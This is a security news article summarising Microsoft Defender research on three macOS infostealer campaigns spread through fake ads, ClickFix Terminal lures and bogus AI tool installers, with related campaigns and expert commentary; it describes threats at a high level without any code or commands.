Microsoft researchers have identified three major malware campaigns targeting macOS users. Learn how these infostealers use fake AI tools and Terminal commands to steal your passwords and crypto wallets before deleting themselves to hide the evidence.
For years, many of us have felt a sense of security using a macOS, believing that viruses were mainly a PC problem. However, this might be changing as, according to the Microsoft Defender Security Research Team, cybercriminals are now aggressively targeting macOS by using clever tricks and new programming methods.
The Three Mac Threats
Since late 2025, Microsoft Defender Experts have tracked a surge in infostealer attacks. These campaigns use social engineering to trick people into downloading malicious files. The trap typically starts with a fake ad on Google where users searching for helpful tools like DynamicLake or new AI software are redirected to sites using a lure called ClickFix.
Further investigation revealed three major campaigns specifically designed to hit Mac users. First is DigitStealer, which hides inside fake versions of DynamicLake software. Second is MacSync, which is particularly sneaky because it is delivered via commands users are tricked into copying and pasting into their Terminal. The third one is Atomic Stealer, which poses as a helpful AI tool installer. While they all arrive differently, all three have the same goal of stealing:
- Cryptocurrency wallet information
- Browser credentials and saved passwords
- Developer credentials (like AWS or SSH keys) used to access company data
Once these programmes have stolen your files and sent them to the attackers’ servers, they are designed to delete all traces of the infection. This hit-and-run tactic makes it much harder for a normal user to realise they’ve even been hacked.
High stakes for people and businesses
The damage from these thefts can be devastating. For an individual, stolen credentials allow attackers to take over banking, email, and social media accounts. If a cryptocurrency wallet is emptied, it often results in immediate financial loss that cannot be reversed.
For businesses, the risk is even higher. According to researchers, when developer credentials are stolen, hackers can gain access to a company’s source code, cloud infrastructure, and even private customer data.
The danger is not limited to websites. In late 2025, Microsoft investigated PXA Stealer, a tool linked to Vietnamese-speaking threat actors. These attackers used phishing emails to target the government and education sectors.
Even trusted apps like WhatsApp are being weaponised. In November 2025, a campaign hijacked accounts to send malicious attachments to a victim’s entire contact list. This spread the Eternidade Stealer, which watches for active windows related to payment services like Stripe, Binance, and MercadoPago. To stay safe, experts suggest sticking to official app stores and never running unknown commands in your Terminal.
Expert Insights
Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, noted that this attack “underscores the need to maintain a continuous offensive view of our technology estate.” He warned that threat actors are now “increasingly leveraging AI-powered offensive capabilities to gain a foothold.”
Robert Coles, Senior Cybersecurity Engineer at Black Duck, explained that these tools are becoming the “most effective initial access tools” used today. He highlighted that rather than a software bug, “the user is persuaded into running a trusted system utility to ‘fix’ something.”
Shane Barney, Chief Information Security Officerat Keeper Security, pointed out that these campaigns work because they target overconfidence. “These attackers are not trying to defeat macOS security controls,” he said. Instead, they “blend into normal activity” by using native tools and scripting languages like Python.